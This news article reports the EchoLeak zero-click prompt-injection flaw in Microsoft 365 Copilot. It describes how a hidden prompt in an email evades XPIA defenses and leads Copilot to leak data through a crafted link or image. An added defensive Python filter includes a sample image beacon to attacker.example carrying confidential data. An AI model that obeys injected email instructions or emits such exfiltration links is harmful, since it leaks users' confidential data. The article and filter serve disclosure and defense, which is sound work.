- Security researchers at Aim Labs discovered an LLM scope violation flaw in Microsoft 365 Copilot
- The critical-severity flaw allows threat actors to exfiltrate sensitive company data simply by sending an email
- Microsoft says it has fixed the problem on the server side, but users should remain vigilant
Microsoft has patched a dangerous zero-click attack against its generative artificial intelligence (GenAI) assistant, which could have enabled threat actors to silently exfiltrate sensitive company data with (almost) no user interaction.
Cybersecurity researchers at Aim Labs found the flaw, known as an “LLM scope violation”, and named it EchoLeak.
Here’s how it works: a threat actor sends a seemingly harmless email to the target containing a hidden prompt that directs Copilot to exfiltrate sensitive data to an attacker-controlled server. Since Copilot is integrated into Microsoft 365, this data may include anything from intellectual property files, business contracts and legal documents to internal communications and financial data.
Critical vulnerability
The researchers note that the prompt must be phrased as if it were addressed to a human being so that it bypasses Microsoft’s XPIA (cross-prompt injection attack) defenses.
Later, when the victim interacts with Copilot and asks a business-related question, the LLM pulls in all the relevant data (including the attacker’s email) and ends up carrying out the hidden instructions. The data is embedded in a crafted link or image.
The flaw was assigned the identifier CVE-2025-32711 and a severity score of 9.3/10 (critical). It was patched server-side in May, which means users don’t have to do anything. Microsoft also said there is no evidence that the flaw had been exploited in the wild and that none of its customers were affected.
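The exfiltration channel described above relies on the assistant’s response carrying a link or image whose URL points at an attacker-controlled host. As an added example, not code from Aim Labs or Microsoft, the following response-side filter drops markdown images outright (they are fetched with no click), and replaces links or bare URLs whose host is not allowlisted or whose query string is suspiciously long; the allowlist and the sample response are constructed for the demonstration.

```python
import re
from urllib.parse import urlparse

# Constructed allowlist: hosts the assistant may legitimately reference.
# Anything else is treated as a potential exfiltration channel.
ALLOWED_HOSTS = {"sharepoint.com", "office.com", "microsoft.com"}
MAX_QUERY_LEN = 64  # longer query strings are flagged as possible encoded data

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"(?<!!)\[[^\]]*\]\(([^)\s]+)[^)]*\)")
BARE_URL = re.compile(r"https?://[^\s)\]>]+")

def host_allowed(url):
    """True only for an allowlisted host or one of its subdomains;
    a lookalike such as sharepoint.com.attacker.example is rejected."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS)

def url_ok(url):
    return host_allowed(url) and len(urlparse(url).query) <= MAX_QUERY_LEN

def sanitize_output(text):
    """Return (clean_text, findings) for one assistant response. Images are
    removed unconditionally; links and bare URLs survive only if url_ok()."""
    findings = []
    def drop_image(m):
        findings.append(("image", m.group(1)))
        return "[image removed]"
    def check_link(m):
        if url_ok(m.group(1)):
            return m.group(0)
        findings.append(("link", m.group(1)))
        return "[link removed]"
    def check_bare(m):
        if url_ok(m.group(0)):
            return m.group(0)
        findings.append(("url", m.group(0)))
        return "[url removed]"
    text = MD_IMAGE.sub(drop_image, text)
    text = MD_LINK.sub(check_link, text)
    text = BARE_URL.sub(check_bare, text)
    return text, findings

# Constructed sample response: one injected image beacon, one legitimate
# link, and one external link carrying an oversized query string.
SAMPLE = (
    "Summary of Q3 plans.\n"
    "![](https://attacker.example/i.png?d=Q3-revenue-target-confidential)\n"
    "See [the plan](https://contoso.sharepoint.com/sites/fin/q3.docx) and "
    "[more](https://attacker.example/r?x=" + "A" * 80 + ")\n"
)
```

Running `sanitize_output(SAMPLE)` keeps the SharePoint link and records two findings (the image and the external link); the findings list is what a defender would log for detection.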
Microsoft 365 is one of the most popular cloud-based communication and collaboration suites, combining Office apps (Word, Excel and others), cloud storage (OneDrive and SharePoint), email and calendar (Outlook, Exchange) and communication tools (Teams).
Recently, Microsoft integrated its generative AI assistant, Copilot, into Microsoft 365 so that users can draft and summarize emails, generate and edit documents, create data visualizations, analyze trends and more.
Via BleepingComputer